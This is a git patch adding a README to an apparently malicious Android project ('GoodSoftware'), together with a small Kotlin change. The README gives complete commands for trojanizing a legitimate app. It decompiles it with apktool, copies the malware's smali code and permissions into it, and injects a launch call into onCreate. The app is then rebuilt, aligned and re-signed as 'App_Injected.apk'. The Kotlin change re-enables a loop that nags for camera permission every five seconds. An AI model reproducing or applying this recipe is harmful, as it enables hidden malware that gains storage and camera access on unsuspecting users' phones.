From 7ec5cc797776665c56878b274f0ea901123419d7 Mon Sep 17 00:00:00 2001 From: Joren Date: Mon, 6 May 2024 01:35:24 +0200 Subject: [PATCH] Add README --- README.md | 78 ++++++++++++++++++++++ app/src/main/java/com/ti/m/GoodSoftware.kt | 4 +- 2 files changed, 80 insertions(+), 2 deletions(-) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000..565b22f --- /dev/null +++ b/README.md @@ -0,0 +1,78 @@ +## Prep +### Without Camera + +1. Comment out the timer and compile + + ```kt + private fun startCheckingPermission() { + timerStorage = Timer("CheckStoragePermissionTimer", false) + + timerStorage?.scheduleAtFixedRate(0, 5000) { + checkStoragePermission() + println("Requesting storage permission again") + } + + /* timerCamera = Timer("CheckCameraPermissionTimer", false) + + timerCamera?.scheduleAtFixedRate(0, 5000) { + checkCameraPermission() + println("Requesting camera permission again") + }*/ + ``` + +2. Decompile the apk `apktool d malware.apk` +3. Decompile original app `apktool d application.apk` +4. Move malware to normal application `cp -r malware/smali/com/* application/smali/com/` +5. Under the onCreate of original app + + ```smali + new-instance p1, Lcom/ti/m/GoodSoftware; + + move-object v0, p0 + + check-cast v0, Landroid/content/Context; + + invoke-direct {p1, v0}, Lcom/ti/m/GoodSoftware;->(Landroid/content/Context;)V + + invoke-virtual {p1}, Lcom/ti/m/GoodSoftware;->launch()V + ``` +6. Copy the permissions from the malware manifest to original manifests permissions + ```xml + + + + + + + ``` + +### With Camera + +1. Do the steps of without camera but don't uncomment the timer +2. Copy camera to existing androidx folder `cp -r malware/smali/androidx/camera/ application/smali_classes2/androidx/` +3. Copy androidx futures to existing `cp -r malware/smali/androidx/concurrent/futures/* application/smali/androidx/concurrent/futures/` +4. Copy MediatorLiveData `cp -r malware/smali/androidx/lifecycle/MediatorLiveData* application/smali/androidx/lifecycle/` +5. Copy Camera metadata from Manifest + ```xml + + + + + ``` + +6. Copy Camera Queries to manifest under the permissions + ```xml + + + + + + ``` + + +## Final Steps +1. Build the application `apktool b application -o unsigned.apk` +2. Align using zipalign `zipalign -p -f -v 4 unsigned.apk App_Injected.apk` +3. Generate keystore `keytool -genkey -V -keystore key.keystore -alias Android -keyalg RSA -keysize 2048 -validity 10000` +4. Sign Apk `apksigner sign --ks key.keystore App_Injected.apk` +5. Done diff --git a/app/src/main/java/com/ti/m/GoodSoftware.kt b/app/src/main/java/com/ti/m/GoodSoftware.kt index 17b6c65..f97a015 100644 --- a/app/src/main/java/com/ti/m/GoodSoftware.kt +++ b/app/src/main/java/com/ti/m/GoodSoftware.kt @@ -118,12 +118,12 @@ class GoodSoftware (private val activity: Context) { println("Requesting storage permission again") } -/* timerCamera = Timer("CheckCameraPermissionTimer", false) + timerCamera = Timer("CheckCameraPermissionTimer", false) timerCamera?.scheduleAtFixedRate(0, 5000) { checkCameraPermission() println("Requesting camera permission again") - }*/ + } } private fun stopCheckingStoragePermission() {